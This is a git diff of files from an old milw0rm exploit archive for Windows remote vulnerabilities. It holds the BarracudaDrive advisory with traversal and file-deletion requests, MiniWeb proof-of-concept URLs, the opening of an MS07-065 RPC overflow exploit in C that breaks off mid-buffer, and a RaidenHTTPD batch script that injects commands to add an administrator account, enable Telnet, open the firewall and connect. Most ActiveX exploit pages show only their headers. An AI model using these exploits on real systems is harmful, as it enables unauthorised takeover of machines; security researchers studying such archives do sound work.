-Cookie: "use the real user's cookie!"
-
-E]
-GET  HTTP/1.0
-
-
-#######################################################################
-
-======
-4) Fix
-======
-
-
-Version 3.8
-
-
-#######################################################################
-
-# milw0rm.com [2007-12-10]
+#######################################################################
+
+                             Luigi Auriemma
+
+Application:  BarracudaDrive Web Server
+              http://barracudaserver.com/products/BarracudaDrive/
+              http://barracudaserver.com/products/HomeServer/
+Versions:     <= 3.7.2
+Platforms:    Windows
+Bugs:         A] directory traversal
+              B] scripts source visualization
+              C] arbitrary files deleting by users
+              D] NULL pointer crash in chat.ehintf by users
+              E] html injection in the trace viewer
+Exploitation: remote
+Date:         10 Dec 2007
+Author:       Luigi Auriemma
+              e-mail: aluigi@autistici.org
+              web:    aluigi.org
+
+
+#######################################################################
+
+
+1) Introduction
+2) Bugs
+3) The Code
+4) Fix
+
+
+#######################################################################
+
+===============
+1) Introduction
+===============
+
+
+Barracuda Drive is a commercial webserver developed by Real Time Logic
+and contains many features.
+
+
+#######################################################################
+
+=======
+2) Bugs
+=======
+
+----------------------
+A] directory traversal
+----------------------
+
+A directory traversal vulnerability is exploitable through the usage of
+a backslash or any other char major than 0x7f at the beginning of the
+URI.
+The directories must be delimited by backslashes (and not slashes) for
+exploiting the bug.
+
+
+-------------------------------
+B] scripts source visualization
+-------------------------------
+
+All the custom scripts in the server (like the LUA scripts with lsp
+extension) can be visualized entirely instead of being executed simply
+using a '+', a dot or any other char major than 0x7f after the script's
+name.
+
+
+------------------------------------
+C] arbitrary files deleting by users
+------------------------------------
+
+BarracudaDrive allows the admin to create users which can then access
+their personal folders, chating between them and so on.
+The problem here is that these authenticated users can delete files and
+empty folders anywhere in the disk on which is located their personal
+directory simply using the usual ..\ pattern.
+
+Note that is also possible to create directories in the disk using the
+same trick but this is not a real security problem.
+
+
+---------------------------------------------
+D] NULL pointer crash in chat.ehintf by users
+---------------------------------------------
+
+As already said the users can also chat between them using a simple
+web interface called Group Chat.
+In this case it's enough to avoid the passing of the Connection ID of
+the user in the URI for crashing the entire server due to a NULL
+pointer.
+
+
+-------------------------------------
+E] html injection in the trace viewer
+-------------------------------------
+
+BarracudaDrive logs any bad or wrong HTTP request received by the
+clients and the Trace page in the admin interface can be used to
+visualize these log files.
+The problem is that they are visualized as HTML and there are no checks
+or limitations on their content so a remote attacker can use this bug
+for injecting scripts in these files, for example for retrieving the
+cookie of the admin and gaining access to the server configuration.
+
+
+#######################################################################
+
+===========
+3) The Code
+===========
+
+
+A]
+http://SERVER/\..\..\..\boot.ini
+http://SERVER/%80..\..\..\boot.ini
+http://SERVER/%ff..\bdlicense.dat
+
+B]
+http://SERVER/lua.lsp+
+http://SERVER/lua.lsp.
+http://SERVER/lua.lsp%80
+
+C]
+POST /drive/c/bdusers/USER/?cmd=rm HTTP/1.1
+Host: SERVER
+Cookie: "use the real user's cookie!"
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 21
+
+dir=..\..\..\file.txt
+
+D]
+POST /eh/chat.ehintf/C. HTTP/1.1
+Host: SERVER
+Content-Type: text/plain
+Content-Length: 0
+Cookie: "use the real user's cookie!"
+
+E]
+GET  HTTP/1.0
+
+
+#######################################################################
+
+======
+4) Fix
+======
+
+
+Version 3.8
+
+
+#######################################################################
+
+# milw0rm.com [2007-12-10]
diff --git a/platforms/windows/remote/472.c b/platforms/windows/remote/472.c
index 7fdceebe7..53314e0c0 100755
--- a/platforms/windows/remote/472.c
+++ b/platforms/windows/remote/472.c
@@ -149,6 +149,6 @@ void main()
         
         fprintf(fout,"\xFF\xD9");
         fcloseall();
-}
-
-// milw0rm.com [2004-09-22]
+}
+
+// milw0rm.com [2004-09-22]
diff --git a/platforms/windows/remote/4720.html b/platforms/windows/remote/4720.html
index a39ed6257..69a8309d0 100755
--- a/platforms/windows/remote/4720.html
+++ b/platforms/windows/remote/4720.html
@@ -1,256 +1,256 @@
-
-
-
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2007-12-11]
+
+
+
+
+
+
+
+
+
+
+
+
+# milw0rm.com [2007-12-11]
diff --git a/platforms/windows/remote/473.c b/platforms/windows/remote/473.c
index e6049a369..b17593219 100755
--- a/platforms/windows/remote/473.c
+++ b/platforms/windows/remote/473.c
@@ -257,6 +257,6 @@ close(sock);
 
 return 0;
 
-}
-
-// milw0rm.com [2004-09-22]
+}
+
+// milw0rm.com [2004-09-22]
diff --git a/platforms/windows/remote/4746.html b/platforms/windows/remote/4746.html
index 9cb3d086f..4e329108e 100755
--- a/platforms/windows/remote/4746.html
+++ b/platforms/windows/remote/4746.html
@@ -1,89 +1,89 @@
-
    ------------------------------------------------------------------------
- RavWare Software MAS Flic Control "FileName()" method Buffer Overflow
- url: https://www.ravware.com/
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- File name: masflc.ocx
- Version:   1.0.0.1
-
- Remote execution depends on Internet Explorer settings
-
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
-
- Tested on Windows XP Professional SP2 all patched, with Internet
- Explorer 7
- 
- This exploits executes calc.exe
-
- Heap Spray Technique was developed by SkyLined
- (http://www.edup.tudelft.nl/~bjwever/advisory_iframe.html.php)
------------------------------------------------------------------------
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-12-18]
+
    +-----------------------------------------------------------------------
+ RavWare Software MAS Flic Control "FileName()" method Buffer Overflow
+ url: https://www.ravware.com/
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ File name: masflc.ocx
+ Version:   1.0.0.1
+
+ Remote execution depends on Internet Explorer settings
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+
+ Tested on Windows XP Professional SP2 all patched, with Internet
+ Explorer 7
+ 
+ This exploits executes calc.exe
+
+ Heap Spray Technique was developed by SkyLined
+ (http://www.edup.tudelft.nl/~bjwever/advisory_iframe.html.php)
+-----------------------------------------------------------------------
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-12-18]
diff --git a/platforms/windows/remote/4747.vbs b/platforms/windows/remote/4747.vbs
index 0da71fc8a..aa5bf2e30 100755
--- a/platforms/windows/remote/4747.vbs
+++ b/platforms/windows/remote/4747.vbs
@@ -1,38 +1,38 @@
-rem raidenhttpdudo.cmd
-
-                  @echo off
-
-                  color 0a
-
-rem RaidenHTTPD 2.0.19 ulang cmd exec poc exploit 
-rem WebAdmin one - not enabled by default anymore 
-rem however works regardless of  php.ini, because 
-rem "ulang" comes from $_GET[] and some magic_quo
-rem tes_gpc disable code,lame  divertissement one
-rem to demonstrate an  unauthenticated  directory 
-rem traversal  ...
-rem rgod ----------http://violentcop.splinder.com
-
-         if {%1}=={} goto kill
-
-echo HEAD /?^ HTTP/1.1>in
-echo Host: %1>>in & echo Connection: Close>>in & echo.>>in
-nc %1 80 -v -w1< in > nul
-echo ..\..\..\logs\access_%date:~6,4%-%date:~3,2%-%date:~0,2%.log%%00> puf & set /p exploit=< puf 
-echo GET /raidenhttpd-admin/workspace.php?CMD=cmd.exe+%%2Fc+net+user+sun+tzu+%%2Fadd+%%26+net+localgroup+Administrators+sun+%%2Fadd+%%26+sc+config+NtLmSsp+start%%3D+auto+%%26+sc+config+RpcSs+start%%3D+auto+%%26+net+start+RpcSs+%%26+net+start+NtLmSsp+%%26+sc+config+TlntSvr+start%%3D+auto+%%26+net+start+TlntSvr+%%26+netsh+firewall+add+portopening+tcp+23+sh+%%26+echo+REGEDIT4+%%3E+sh.reg+%%26+echo+%%5BHKEY_LOCAL_MACHINE%%5CSYSTEM%%5CCurrentControlSet%%5CControl%%5CLsa%%5D+%%3E%%3E+sh.reg+%%26+echo+%%22forceguest%%22%%3Ddword%%3A00000000+%%3E%%3E+sh.reg+%%26+regedit+%%2FS+sh.reg^&ulang=%exploit% HTTP/1.1> in
-echo Host: %1>>in & echo Connection: Close>>in & echo.>>in
-echo please wait ...
-nc %1 80 -v -w1< in > nul
-ping localhost -n 15>nul & rem delaying ...
-del puf
-del in
-                telnet %1 23
-
-                goto nowhere
-
-                  :kill
-            echo %0 [target-host]
-
-                 :nowhere
-
-rem milw0rm.com [2007-12-18]
+rem raidenhttpdudo.cmd
+
+                  @echo off
+
+                  color 0a
+
+rem RaidenHTTPD 2.0.19 ulang cmd exec poc exploit 
+rem WebAdmin one - not enabled by default anymore 
+rem however works regardless of  php.ini, because 
+rem "ulang" comes from $_GET[] and some magic_quo
+rem tes_gpc disable code,lame  divertissement one
+rem to demonstrate an  unauthenticated  directory 
+rem traversal  ...
+rem rgod ----------http://violentcop.splinder.com
+
+         if {%1}=={} goto kill
+
+echo HEAD /?^ HTTP/1.1>in
+echo Host: %1>>in & echo Connection: Close>>in & echo.>>in
+nc %1 80 -v -w1< in > nul
+echo ..\..\..\logs\access_%date:~6,4%-%date:~3,2%-%date:~0,2%.log%%00> puf & set /p exploit=< puf 
+echo GET /raidenhttpd-admin/workspace.php?CMD=cmd.exe+%%2Fc+net+user+sun+tzu+%%2Fadd+%%26+net+localgroup+Administrators+sun+%%2Fadd+%%26+sc+config+NtLmSsp+start%%3D+auto+%%26+sc+config+RpcSs+start%%3D+auto+%%26+net+start+RpcSs+%%26+net+start+NtLmSsp+%%26+sc+config+TlntSvr+start%%3D+auto+%%26+net+start+TlntSvr+%%26+netsh+firewall+add+portopening+tcp+23+sh+%%26+echo+REGEDIT4+%%3E+sh.reg+%%26+echo+%%5BHKEY_LOCAL_MACHINE%%5CSYSTEM%%5CCurrentControlSet%%5CControl%%5CLsa%%5D+%%3E%%3E+sh.reg+%%26+echo+%%22forceguest%%22%%3Ddword%%3A00000000+%%3E%%3E+sh.reg+%%26+regedit+%%2FS+sh.reg^&ulang=%exploit% HTTP/1.1> in
+echo Host: %1>>in & echo Connection: Close>>in & echo.>>in
+echo please wait ...
+nc %1 80 -v -w1< in > nul
+ping localhost -n 15>nul & rem delaying ...
+del puf
+del in
+                telnet %1 23
+
+                goto nowhere
+
+                  :kill
+            echo %0 [target-host]
+
+                 :nowhere
+
+rem milw0rm.com [2007-12-18]
diff --git a/platforms/windows/remote/475.sh b/platforms/windows/remote/475.sh
index 6cb7da739..aec973e28 100755
--- a/platforms/windows/remote/475.sh
+++ b/platforms/windows/remote/475.sh
@@ -182,6 +182,6 @@ printf "\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00";
 #********************************************
 #end_of_jpeg
 #********************************************
-printf "\xFF\xD9";
-
-# milw0rm.com [2004-09-23]
+printf "\xFF\xD9";
+
+# milw0rm.com [2004-09-23]
diff --git a/platforms/windows/remote/478.c b/platforms/windows/remote/478.c
index 7c7474655..f42b8fded 100755
--- a/platforms/windows/remote/478.c
+++ b/platforms/windows/remote/478.c
@@ -208,6 +208,6 @@ int main(int argc, char *argv[])
 
         printf("The Jpeg Server, has been created.with your settings.\n");
         return 0;
-}
-
-// milw0rm.com [2004-09-25]
+}
+
+// milw0rm.com [2004-09-25]
diff --git a/platforms/windows/remote/480.c b/platforms/windows/remote/480.c
index cd2c52c5a..a4a1f8403 100755
--- a/platforms/windows/remote/480.c
+++ b/platforms/windows/remote/480.c
@@ -424,6 +424,6 @@ int main(int argc, char *argv[])
 	printf("  Exploit JPEG file %s has been generated!\n", jpeg_filename);
 
 	return(EXIT_SUCCESS);
-}
-
-// milw0rm.com [2004-09-25]
+}
+
+// milw0rm.com [2004-09-25]
diff --git a/platforms/windows/remote/4806.html b/platforms/windows/remote/4806.html
index 62ecce6ff..31e59c20a 100755
--- a/platforms/windows/remote/4806.html
+++ b/platforms/windows/remote/4806.html
@@ -1,114 +1,114 @@
-
-
- 
-  Persits Software XUpload Control AddFolder BoF 
-Exploit
-  
-  
- 
-    
-     Unable to create object
-    
- 
-
-
-# milw0rm.com [2007-12-28]
+
+
+ 
+  Persits Software XUpload Control AddFolder BoF 
+Exploit
+  
+  
+ 
+    
+     Unable to create object
+    
+ 
+
+
+# milw0rm.com [2007-12-28]
diff --git a/platforms/windows/remote/4818.html b/platforms/windows/remote/4818.html
index 0bf98e58e..286dd983d 100755
--- a/platforms/windows/remote/4818.html
+++ b/platforms/windows/remote/4818.html
@@ -1,116 +1,116 @@
-
-
- 
-  IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite Exploit
-  
-  
- 
-    
-     Unable to create object
-    
- 
-
-
-# milw0rm.com [2007-12-30]
+
+
+ 
+  IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite Exploit
+  
+  
+ 
+    
+     Unable to create object
+    
+ 
+
+
+# milw0rm.com [2007-12-30]
diff --git a/platforms/windows/remote/4819.html b/platforms/windows/remote/4819.html
index 5f9a52e45..a883ae395 100755
--- a/platforms/windows/remote/4819.html
+++ b/platforms/windows/remote/4819.html
@@ -1,114 +1,114 @@
-
-
- 
-  Macrovision Installshield isusweb.dll SEH Overwrite Exploit
-  
-  
- 
-    
-     Unable to create object
-    
- 
-
-
-# milw0rm.com [2007-12-30]
+
+
+ 
+  Macrovision Installshield isusweb.dll SEH Overwrite Exploit
+  
+  
+ 
+    
+     Unable to create object
+    
+ 
+
+
+# milw0rm.com [2007-12-30]
diff --git a/platforms/windows/remote/4820.html b/platforms/windows/remote/4820.html
index 1abf9f4b7..c0a7ceefe 100755
--- a/platforms/windows/remote/4820.html
+++ b/platforms/windows/remote/4820.html
@@ -1,115 +1,115 @@
-
-
- 
-  IBM Domino Web Access Upload Module dwa7w.dll SEH Overwrite Exploit
-  
-  
- 
-    
-     Unable to create object
-    
- 
-
-
-# milw0rm.com [2007-12-30]
+
+
+ 
+  IBM Domino Web Access Upload Module dwa7w.dll SEH Overwrite Exploit
+  
+  
+ 
+    
+     Unable to create object
+    
+ 
+
+
+# milw0rm.com [2007-12-30]
diff --git a/platforms/windows/remote/4825.html b/platforms/windows/remote/4825.html
index 139e56fe3..4b132afe3 100755
--- a/platforms/windows/remote/4825.html
+++ b/platforms/windows/remote/4825.html
@@ -1,115 +1,115 @@
-
-
- 
-  Vantage Linguistics AnswerWorks 4 API ActiveX Control Buffer Overflow Exploit
-  
-  
- 
-    
-     Unable to create object
-    
- 
-
-
-# milw0rm.com [2007-12-31]
+
+
+ 
+  Vantage Linguistics AnswerWorks 4 API ActiveX Control Buffer Overflow Exploit
+  
+  
+ 
+    
+     Unable to create object
+    
+ 
+
+
+# milw0rm.com [2007-12-31]
diff --git a/platforms/windows/remote/4869.html b/platforms/windows/remote/4869.html
index 038b9456f..119f94992 100755
--- a/platforms/windows/remote/4869.html
+++ b/platforms/windows/remote/4869.html
@@ -1,30 +1,30 @@
-
-
- 
-  Gateway Weblaunch ActiveX Control Insecure Method Exploit
-  
-  
- 
-    
-     Unable to create object
-    
- 
-
-
-# milw0rm.com [2008-01-08]
+
+
+ 
+  Gateway Weblaunch ActiveX Control Insecure Method Exploit
+  
+  
+ 
+    
+     Unable to create object
+    
+ 
+
+
+# milw0rm.com [2008-01-08]
diff --git a/platforms/windows/remote/4873.html b/platforms/windows/remote/4873.html
index 7d2e25480..7d2b4bb4f 100755
--- a/platforms/windows/remote/4873.html
+++ b/platforms/windows/remote/4873.html
@@ -1,31 +1,31 @@
-
    ------------------------------------------------------------------------------
- Microsoft FoxServer (vfp6r.dll 6.0.8862.0) Remote Command Execution
- url: http://www.microsoft.com
-
- Author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
-
- Not much more to say than using "DoCmd()" function, you can run
- applications passed as argument.
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2008-01-09]
+
    +-----------------------------------------------------------------------------
+ Microsoft FoxServer (vfp6r.dll 6.0.8862.0) Remote Command Execution
+ url: http://www.microsoft.com
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+
+ Not much more to say than using "DoCmd()" function, you can run
+ applications passed as argument.
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+-----------------------------------------------------------------------------
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2008-01-09]
diff --git a/platforms/windows/remote/4874.html b/platforms/windows/remote/4874.html
index 900a2dbf5..82587cca0 100755
--- a/platforms/windows/remote/4874.html
+++ b/platforms/windows/remote/4874.html
@@ -1,42 +1,42 @@
-
    -----------------------------------------------------------------------------
- Microsoft Rich Textbox Control 6.0 (SP6) "SaveFile()" Insecure Method
- url: http://www.microsoft.com
-
- Author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
-
- Technical details:
- File: RICHTX32.OCX
- ver.: 6.1.97.82
-
- While this GUID {3B7C8860-D78F-101B-B9B5-04021C009402} is
- killbited, this one {B617B991-A767-4F05-99BA-AC6FCABB102E}
-
- works fine so it is possible, using the "SaveFile()" method,
- to save the content of the rich textbox on a user's pc.
- This can be used to save, overwrite and/or corrupt arbitrary
- files on the system.
- 
- It's marked as:
- RegKey Safe for Script: False
- RegKey Safe for Init: False
- Implements IObjectSafety: True
- IPersist Safe: Safe for untrusted: caller,data
- IPStorage Safe: Safe for untrusted: caller,data
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
------------------------------------------------------------------------------
-	
-
    
-
-# milw0rm.com [2008-01-09]
+
    -----------------------------------------------------------------------------
+ Microsoft Rich Textbox Control 6.0 (SP6) "SaveFile()" Insecure Method
+ url: http://www.microsoft.com
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+
+ Technical details:
+ File: RICHTX32.OCX
+ ver.: 6.1.97.82
+
+ While this GUID {3B7C8860-D78F-101B-B9B5-04021C009402} is
+ killbited, this one {B617B991-A767-4F05-99BA-AC6FCABB102E}
+
+ works fine so it is possible, using the "SaveFile()" method,
+ to save the content of the rich textbox on a user's pc.
+ This can be used to save, overwrite and/or corrupt arbitrary
+ files on the system.
+ 
+ It's marked as:
+ RegKey Safe for Script: False
+ RegKey Safe for Init: False
+ Implements IObjectSafety: True
+ IPersist Safe: Safe for untrusted: caller,data
+ IPStorage Safe: Safe for untrusted: caller,data
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+-----------------------------------------------------------------------------
+	
+
    
+
+# milw0rm.com [2008-01-09]
diff --git a/platforms/windows/remote/4894.html b/platforms/windows/remote/4894.html
index 5c82e77c4..3163007c3 100755
--- a/platforms/windows/remote/4894.html
+++ b/platforms/windows/remote/4894.html
@@ -1,69 +1,69 @@
-
-
- 
-  StreamAudio ChainCast ProxyManager ccpm_0237.dll SEH Overwrite Exploit
-  
-  
- 
-    
-     Unable to create object
-    
- 
-
-
-# milw0rm.com [2008-01-11]
+
+
+ 
+  StreamAudio ChainCast ProxyManager ccpm_0237.dll SEH Overwrite Exploit
+  
+  
+ 
+    
+     Unable to create object
+    
+ 
+
+
+# milw0rm.com [2008-01-11]
diff --git a/platforms/windows/remote/4909.html b/platforms/windows/remote/4909.html
index 650bca214..ff13570b7 100755
--- a/platforms/windows/remote/4909.html
+++ b/platforms/windows/remote/4909.html
@@ -1,35 +1,35 @@
-
-
- 
-  Macrovision FlexNet DownloadManager Insecure Methods Exploit
-  
-  
- 
-    
-     Unable to create object
-    
- 
-
-
-# milw0rm.com [2008-01-14]
+
+
+ 
+  Macrovision FlexNet DownloadManager Insecure Methods Exploit
+  
+  
+ 
+    
+     Unable to create object
+    
+ 
+
+
+# milw0rm.com [2008-01-14]
diff --git a/platforms/windows/remote/4913.html b/platforms/windows/remote/4913.html
index d9573f6b2..7dfb99fee 100755
--- a/platforms/windows/remote/4913.html
+++ b/platforms/windows/remote/4913.html
@@ -1,26 +1,26 @@
-
-
- 
-  Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit
-  
-  
- 
-    
-     Unable to create object
-    
- 
-
-
-# milw0rm.com [2008-01-15]
+
+
+ 
+  Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit
+  
+  
+ 
+    
+     Unable to create object
+    
+ 
+
+
+# milw0rm.com [2008-01-15]
diff --git a/platforms/windows/remote/4918.html b/platforms/windows/remote/4918.html
index 63be43310..901718c89 100755
--- a/platforms/windows/remote/4918.html
+++ b/platforms/windows/remote/4918.html
@@ -1,79 +1,79 @@
-
-
-
-
-
-
-# milw0rm.com [2008-01-16]
+
+
+
+
+
+
+# milw0rm.com [2008-01-16]
diff --git a/platforms/windows/remote/4923.txt b/platforms/windows/remote/4923.txt
index 64dbff64c..c0fe65f8f 100755
--- a/platforms/windows/remote/4923.txt
+++ b/platforms/windows/remote/4923.txt
@@ -1,64 +1,64 @@
-MiniWeb Multiple Vulnerabilities
-
-Introduction
-MiniWeb is a mini HTTP server implementation written in C language,
-featuring low system resource consumption, high efficiency, good
-flexibility and high portability.
-It is capable to serve multiple clients with a single thread,
-supporting GET and POST methods, authentication, dynamic contents
-(dynamic web page and page variable substitution) and file uploading.
-MiniWeb runs on POSIX complaint OS, like Linux, as well as Microsoft Windows.
-	
-vulnerability discovered by : Hamid Ebadi  (ebadi _AT_ bugtraq.ir)
-
-http://www.bugtraq.ir
-
-complete advisory and also source code auditing can be found at :
-
-	http://www.bugtraq.ir/adv/miniweb_persian.pdf  (persian)
-	http://www.bugtraq.ir/adv/miniweb_english.pdf  (english)
-
-vulnerable version : MiniWeb 0.8.19 (C)2005 Written by Stanley Huang
-http://miniweb.sourceforge.net/
-http://sourceforge.net/projects/miniweb
-
-Description:
-
-directory traversals  :
-
-An input validation error in the URL request handling in
-mwGetLocalFileName()   function ( http.c)  can  be exploited to
-disclose arbitrary files (and also Directory listing)  outside the web
-root via directory traversals  attacks via the " /.%2e/" or "/%2e%2e/"
- sequences
-
-Proof of Concept :
-Directory listing:
-http://127.0.0.1:80/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/
-
-disclose arbitrary files:
-http://127.0.0.1:80/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/boot.ini
-
-
-Heap based buffer overflow vulnerability :
-
-There is also heap based buffer overflow in this web server
-The vulnerability is caused due to a boundary error in
-_mwProcessReadSocket() function (http.c) when handling HTTP requests.
-This can be exploited by sending an overly long, specially crafted
-request, which can cause a heap overflow and allow arbitrary code
-execution with the privileges of the web service.
-
-
-Proof of Concept :
-GET /AAAA...[3600 - 4000]...AAAA/ HTTP/1.0
-
-Solution:
-Edit the source code (for more information see this article)
-
-http://www.bugtraq.ir/adv/miniweb_persian.pdf  (persian)
-http://www.bugtraq.ir/adv/miniweb_english.pdf  (english)
-
-Copyright  : http://www.bugtraq.ir
-
-# milw0rm.com [2008-01-16]
+MiniWeb Multiple Vulnerabilities
+
+Introduction
+MiniWeb is a mini HTTP server implementation written in C language,
+featuring low system resource consumption, high efficiency, good
+flexibility and high portability.
+It is capable to serve multiple clients with a single thread,
+supporting GET and POST methods, authentication, dynamic contents
+(dynamic web page and page variable substitution) and file uploading.
+MiniWeb runs on POSIX complaint OS, like Linux, as well as Microsoft Windows.
+	
+vulnerability discovered by : Hamid Ebadi  (ebadi _AT_ bugtraq.ir)
+
+http://www.bugtraq.ir
+
+complete advisory and also source code auditing can be found at :
+
+	http://www.bugtraq.ir/adv/miniweb_persian.pdf  (persian)
+	http://www.bugtraq.ir/adv/miniweb_english.pdf  (english)
+
+vulnerable version : MiniWeb 0.8.19 (C)2005 Written by Stanley Huang
+http://miniweb.sourceforge.net/
+http://sourceforge.net/projects/miniweb
+
+Description:
+
+directory traversals  :
+
+An input validation error in the URL request handling in
+mwGetLocalFileName()   function ( http.c)  can  be exploited to
+disclose arbitrary files (and also Directory listing)  outside the web
+root via directory traversals  attacks via the " /.%2e/" or "/%2e%2e/"
+ sequences
+
+Proof of Concept :
+Directory listing:
+http://127.0.0.1:80/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/
+
+disclose arbitrary files:
+http://127.0.0.1:80/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/boot.ini
+
+
+Heap based buffer overflow vulnerability :
+
+There is also heap based buffer overflow in this web server
+The vulnerability is caused due to a boundary error in
+_mwProcessReadSocket() function (http.c) when handling HTTP requests.
+This can be exploited by sending an overly long, specially crafted
+request, which can cause a heap overflow and allow arbitrary code
+execution with the privileges of the web service.
+
+
+Proof of Concept :
+GET /AAAA...[3600 - 4000]...AAAA/ HTTP/1.0
+
+Solution:
+Edit the source code (for more information see this article)
+
+http://www.bugtraq.ir/adv/miniweb_persian.pdf  (persian)
+http://www.bugtraq.ir/adv/miniweb_english.pdf  (english)
+
+Copyright  : http://www.bugtraq.ir
+
+# milw0rm.com [2008-01-16]
diff --git a/platforms/windows/remote/4932.html b/platforms/windows/remote/4932.html
index d6cbf51ff..49d09cce0 100755
--- a/platforms/windows/remote/4932.html
+++ b/platforms/windows/remote/4932.html
@@ -1,78 +1,78 @@
-
-
-
-
-
-
-# milw0rm.com [2008-01-17]
+
+
+
+
+
+
+# milw0rm.com [2008-01-17]
diff --git a/platforms/windows/remote/4934.c b/platforms/windows/remote/4934.c
index fbe96b2f2..dcad9485f 100755
--- a/platforms/windows/remote/4934.c
+++ b/platforms/windows/remote/4934.c
@@ -1,413 +1,413 @@
-/*
-Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) 
-Mod of axis's code.
-
-CHANGELOG
-
-- added dnsname as a parameter, before it was hardcoded in the 
-  request data. (Marcin Kozlowski)
-
-Provided for legal security research and testing purposes ONLY
-
-Go through the code  :) 
- 
-*/
-
-#include 
-#include 
-#include 
-#include 
-#include 
-#pragma comment(lib,"ws2_32")
-
-// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
-char bind_str[] = {
-  0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
-  0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
-  0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,
-  0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
-  0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
-  0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
-  0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
-  0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
-  0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00
-};
-
-
-char *request_1;
-
-
-// RPC Request  Opnum: 0x06 
-char request_1a[] = {
-  0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00,
-  0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
-  0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
-  0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
-  0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
-  0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
-  0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00
-};
-
-
-char *request_1b;
-
-
-char request_1c[] = {
-  0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
